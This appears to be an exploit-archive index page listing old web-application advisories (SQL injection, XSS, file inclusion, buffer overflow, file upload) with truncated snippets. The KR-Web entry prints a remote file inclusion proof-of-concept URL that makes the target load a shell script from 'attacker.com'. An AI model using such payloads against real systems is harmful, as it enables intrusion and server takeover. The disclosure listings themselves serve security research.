work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability

No description provided by source. Rodrigo Duarte WuefezAT2die4.com ;D WORK system e-commerce: WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow, content,package,language,currency,country,price,stock,group user,CSS,banner,logo,...

SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2492/info A buffer overflow in ASPSeek versions 1.0.0 through to 1.0.3 allows for arbitrary code execution with the privileges of the web server. The vulnerable script is s.cgi and the buffer overflow can be accessed by...

OSSIM 2.1 - SQL Injection and xss

No description provided by source. OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3. Unauthorized access Digital Security Research Group DSecRG Advisory DSECRG-09-055 Application: OSSIM Versions Affected: 2.1...

TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities

No description provided by source. ====================================================================== TikiWiki = 1.9.8.1 Local File Inclusion ====================================================================== Author: L4teral l4teral 4t gmail com Impact: Local File Inclusion Status: patch...

SEC Consult 20130417-0 :: Multiple vulnerabilities in Sosci Survey

SEC Consult Vulnerability Lab Security Advisory 20130417-0 ======================================================================= title: Multiple vulnerabilities in Sosci Survey product: Sosci Survey vulnerable version: 2.3.04a fixed version: 2.3.04a impact: Critical homepage:...

Multiple Vulnerabilities in phpGraphy

High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in phpGraphy which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerability in phpGraphy The vulnerability exists due to input sanitation error in th...

Keynect eCommerce - SQL Injection

Keynect eCommerce - SQL Injection ======================================================================================== | Title : SQL Injection Keynect Ecommerce | | Author : Arturo Zamora | | email : [email protected] | | DAte : 10/03/2011 | | Verified : yes | | Risk : High | |...

www.eVuln.com : HTTP Response Splitting in Social Share

www.eVuln.com advisory: HTTP Response Splitting in Social Share Summary: http://evuln.com/vulns/168/summary.html Details: http://evuln.com/vulns/168/description.html -----------Summary----------- eVuln ID: EV0168 Software: Social Share Vendor: n/a Version: 2010-06-05 Critical Level: low Type: HTT...

[eVuln.com] Multiple XSS in Alguest

New eVuln Advisory: Multiple XSS in Alguest Summary: http://evuln.com/vulns/151/summary.html Details: http://evuln.com/vulns/151/description.html -----------Summary----------- eVuln ID: EV0151 Software: Alguest Vendor: n/a Version: 1.1c-patched Critical Level: low Type: Cross Site Scripting Statu...

Multiple Vulnerabilities in BEdita

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BEdita which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerability in BEdita The vulnerability exists due to input sanitation error in...

Multiple Vulnerabilities in Zomplog

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Zomplog which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1 Cross-site scripting XSS vulnerabilities in Zomplog 1.1 The vulnerability exists due to input sanitation...

Elite Gaming Ladders v3.5 SQL Injection Vulnerability

Exploit for php platform in category web applications ===================================================== Elite Gaming Ladders v3.5 SQL Injection Vulnerability ===================================================== - Elite Gaming Ladders v3.5 SQL Injection Vulnerability - ---Date : 2010-06-19...

Cross-site Scripting (XSS) Vulnerabilities in Scribe CMS

High-Tech Bridge SA Security Research Lab has discovered three vulnerabilities in Scribe CMS which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerability in Scribe CMS 1.1 The vulnerability exists due to input sanitation error in the “f” parameter in...

Alibaba Clone Platinum - &#039;/buyer/index.php&#039; SQL Injection

Title: Alibaba Clone Platinum buyer/index.php SQL Injection Vulnerability Author: GuN Published: 2010-14-05 Verified: yes ........../¯¯/.................\¯¯.......... ........./¯.//....................\.¯......... ......../..//.........GuN........\.......... ../´¯/' /´...WJA-TEAM../´...

post Card ( catid ) Remote SQL Injection Vulnerability

Exploit for php platform in category web applications ====================================================== post Card catid Remote SQL Injection Vulnerability ====================================================== post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home :...

UGiA PHP UPLOADER 0.2 - Arbitrary File Upload

UGiA PHP UPLOADER 0.2 - Arbitrary File Upload ======================================================================================== | Title : UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability | Author : indoushka | email : [email protected] | Home : www.iq-ty.com/vb | Script Home :...

phpMDJ 1.0.3 - SQL Injection

,--------------------------------------------------------------, Vulnerable Script : phpMDJ 1.0.3 \ Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip \ Vulnerability : Remote Sql Injection \ '--------------------------------------------------------------'...

ArticleLive 1.7.1.2 - &#039;blogs.php?Id&#039; SQL Injection

Author : Baybora Product : ArticleLive Interspire Website Publisher Version : NX.1.7.1.2 and possibly earlier versions Download : http://www.interspire.com/ Price : $ 249 Site : www.1923turk.biz Vulnerable script: blogs.php?Id = SQL-injection...

KR-Web 1.1b2 Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg KR-Web PoC : http://0wn3d.com/path/adm/krgourl.php?DOCUMENTROOT=http://attacker.com/shell.txt?cmd Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix, dan seluruh orang yang membenciku dan menyayangiku I Love U Full : /\ all member at...

OSSIM 2.1 SQL Injection and xss

Exploit for unknown platform in category web applications =============================== OSSIM 2.1 SQL Injection and xss =============================== OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities. 1. SQL Injections 2. Linked XSS 3...